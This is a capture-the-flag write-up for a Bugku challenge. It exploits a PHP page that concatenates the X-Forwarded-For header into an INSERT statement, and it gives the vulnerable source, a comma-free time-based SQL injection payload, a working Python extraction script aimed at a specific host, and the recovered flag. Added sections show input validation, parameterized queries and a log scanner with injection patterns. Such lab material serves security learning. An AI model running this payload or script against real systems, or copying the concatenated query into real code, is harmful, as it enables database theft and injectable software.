WP - Bugku - INSERT INTO injection

Challenge URL: http://120.24.86.145:8002/web15/

The challenge provides the source code:

```php
<?php
error_reporting(0);

// Returns the first element of X-Forwarded-For when the header is present,
// otherwise REMOTE_ADDR. The header is client-controlled and never validated.
function getIp(){
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(',', $ip);   // anything after the first comma is dropped
    return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
// $ip is concatenated straight into the INSERT statement
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
```
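The defensive counterpart to the code above, as an added example that is not part of the writeup or the challenge: a Python port of the `getIp()` logic that validates the first hop with the `ipaddress` module before it is used, and an INSERT that binds the value as a parameter (sqlite3 in memory, assumed here in place of the challenge's MySQL). The header values are constructed for the demonstration; the third one has the shape of the page's time-based payload.

```python
import ipaddress
import sqlite3

# Constructed sample X-Forwarded-For values (not from the page's traffic):
# a proxy chain, a direct client, and a value shaped like a time-based probe.
SAMPLE_HEADERS = [
    "203.0.113.7, 10.0.0.2",
    "198.51.100.5",
    "11'+(select case when 1=1 then sleep(5) else 0 end))#",
]


def first_forwarded_ip(header):
    """Mirror of the page's getIp(): split on ',' and keep element 0.
    Splitting is all it does; the returned text is never validated."""
    return header.split(",")[0]


def validate_client_ip(header):
    """Return the first hop as a canonical IP string, or None when it is not a
    syntactically valid IPv4/IPv6 address. Quotes, parentheses and SQL keywords
    are rejected here, before the value gets anywhere near a query."""
    candidate = first_forwarded_ip(header).strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return None


def record_ip_parameterized(conn, raw_header):
    """Insert with a bound parameter. Even when validation is skipped, the
    value travels as data rather than SQL text, so a payload is stored
    literally instead of being executed."""
    value = first_forwarded_ip(raw_header)
    conn.execute("INSERT INTO client_ip (ip) VALUES (?)", (value,))
    conn.commit()
    return value


def demo():
    """Run both defenses over the samples; return (validation results, stored rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE client_ip (ip TEXT)")
    results = []
    for header in SAMPLE_HEADERS:
        stored = record_ip_parameterized(conn, header)
        results.append((validate_client_ip(header), stored))
    rows = [r[0] for r in conn.execute("SELECT ip FROM client_ip ORDER BY rowid")]
    return results, rows


if __name__ == "__main__":
    validated, stored_rows = demo()
    for (valid, stored) in validated:
        print("validated:", valid, "| stored literally:", stored)
```

Either measure alone breaks the attack: validation never lets the payload reach SQL, and parameterization makes the payload inert even if it does. Both together are the usual recommendation, since the first also keeps garbage out of the `client_ip` table.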

This is an X-Forwarded-For injection, but the comma `,` is filtered: getIp() splits the header on commas and keeps only the first element, so anything after a comma is discarded. With commas unusable, `if()` cannot be used. Of course, MySQL offers something besides `if`:

```sql
select case when xxx then xxx else xxx end;
```

And because the comma is filtered, substr and substring cannot be used in their usual three-argument form, but here `from 1 for 1` can be used instead. The final payload is:

```
11'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))%23
```

Python script:

```python
import requests
import string

mystring = string.ascii_letters + string.digits
url = 'http://120.24.86.145:8002/web15/'
# The {0}/{1} placeholders are filled by format() below: character position and guessed character
data = "127.0.0.1'+(select case when (substring((select flag from flag) from {0} for 1)='{1}') then sleep(5) else 1 end) and '1'='1"
flag = ''

for i in range(1, 35):
    for j in mystring:
        try:
            headers = {'x-forwarded-for': data.format(str(i), j)}
            res = requests.get(url, headers=headers, timeout=3)
        except requests.exceptions.ReadTimeout:
            # A timeout means sleep(5) ran, so the guess for this position was right
            flag += j
            print(flag)
            break

print('The final flag:' + flag)
```

The script works by sending `127.0.0.1` followed by a condition that is either true or false. With the request timeout set to 3 seconds, a true condition makes the server run sleep(5), the request times out, and the except branch runs and records the guessed character; a false condition returns immediately.
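The detection side of the two points above, the comma-free payload forms (`case when`, `substring(... from ... for ...)`) and the timing behaviour the script depends on, as an added example that is not part of the writeup: it scans constructed access-log lines (the log format, the `xff="..."` and `rt=` fields, and all addresses are assumptions for the demonstration) for injection-shaped X-Forwarded-For values and correlates them with slow responses, which is the signature a blind time-based enumeration leaves behind.

```python
import re
from collections import defaultdict

# Constructed access-log lines (not real traffic): remote address, the
# X-Forwarded-For header the client sent, and the response time in seconds.
SAMPLE_LOG = [
    '198.51.100.9 xff="203.0.113.7, 10.0.0.2" rt=0.012',
    '198.51.100.9 xff="203.0.113.7" rt=0.010',
    '192.0.2.44 xff="127.0.0.1\'+(select case when (substring((select flag from flag) from 1 for 1)=\'a\') then sleep(5) else 1 end) and \'1\'=\'1" rt=0.015',
    '192.0.2.44 xff="127.0.0.1\'+(select case when (substring((select flag from flag) from 1 for 1)=\'b\') then sleep(5) else 1 end) and \'1\'=\'1" rt=0.014',
    '192.0.2.44 xff="127.0.0.1\'+(select case when (substring((select flag from flag) from 1 for 1)=\'f\') then sleep(5) else 1 end) and \'1\'=\'1" rt=5.104',
]

LOG_RE = re.compile(r'^(?P<src>\S+) xff="(?P<xff>.*)" rt=(?P<rt>[\d.]+)$')

# Indicators of time-based blind SQLi inside a header that should only hold
# addresses. The comma-free forms are listed explicitly because the page shows
# them being chosen precisely when ',' is unusable.
SQLI_PATTERNS = [
    ("sleep", re.compile(r"\bsleep\s*\(", re.I)),
    ("benchmark", re.compile(r"\bbenchmark\s*\(", re.I)),
    ("case_when", re.compile(r"\bcase\s+when\b", re.I)),
    ("substring_from_for", re.compile(r"\bsubstr(?:ing)?\s*\(.*\bfrom\b.*\bfor\b", re.I)),
    ("select", re.compile(r"\bselect\b", re.I)),
]

# Loose "looks like an address" check for the first hop: digits, dots, hex, colons.
IP_LIKE = re.compile(r"^\s*[0-9a-fA-F:.]+\s*$")


def parse_line(line):
    """Parse one constructed log line into a dict, or None if it is malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"src": m.group("src"), "xff": m.group("xff"), "rt": float(m.group("rt"))}


def classify_xff(value):
    """Return the indicator names matched by one header value. A first hop that
    is not even address-shaped gets a 'non_ip' tag on top of any SQL indicators."""
    tags = []
    if not IP_LIKE.match(value.split(",")[0]):
        tags.append("non_ip")
    for name, pattern in SQLI_PATTERNS:
        if pattern.search(value):
            tags.append(name)
    return tags


def scan(lines, slow_threshold=3.0):
    """Aggregate per source address. A source is reported when it sends
    injection-shaped headers; 'time_based_likely' is set when at least one of
    those requests was also slow, i.e. the sleep branch was actually taken."""
    per_src = defaultdict(lambda: {"flagged": 0, "slow": 0, "tags": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify_xff(rec["xff"])
        if not tags:
            continue
        stats = per_src[rec["src"]]
        stats["flagged"] += 1
        stats["tags"].update(tags)
        if rec["rt"] >= slow_threshold:
            stats["slow"] += 1
    return {
        src: {
            "flagged": s["flagged"],
            "slow": s["slow"],
            "tags": sorted(s["tags"]),
            "time_based_likely": s["slow"] > 0,
        }
        for src, s in per_src.items()
    }


if __name__ == "__main__":
    for src, report in scan(SAMPLE_LOG).items():
        print(src, report)
```

The pattern match alone already catches every probe, including the ones whose condition was false and returned fast; the slow-response count is what distinguishes a scanner throwing strings at the header from an enumeration that is actually extracting data one character at a time.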

The flag is flag{cdbf14c9551d5be5612f7bb5d2867853}

AbelChe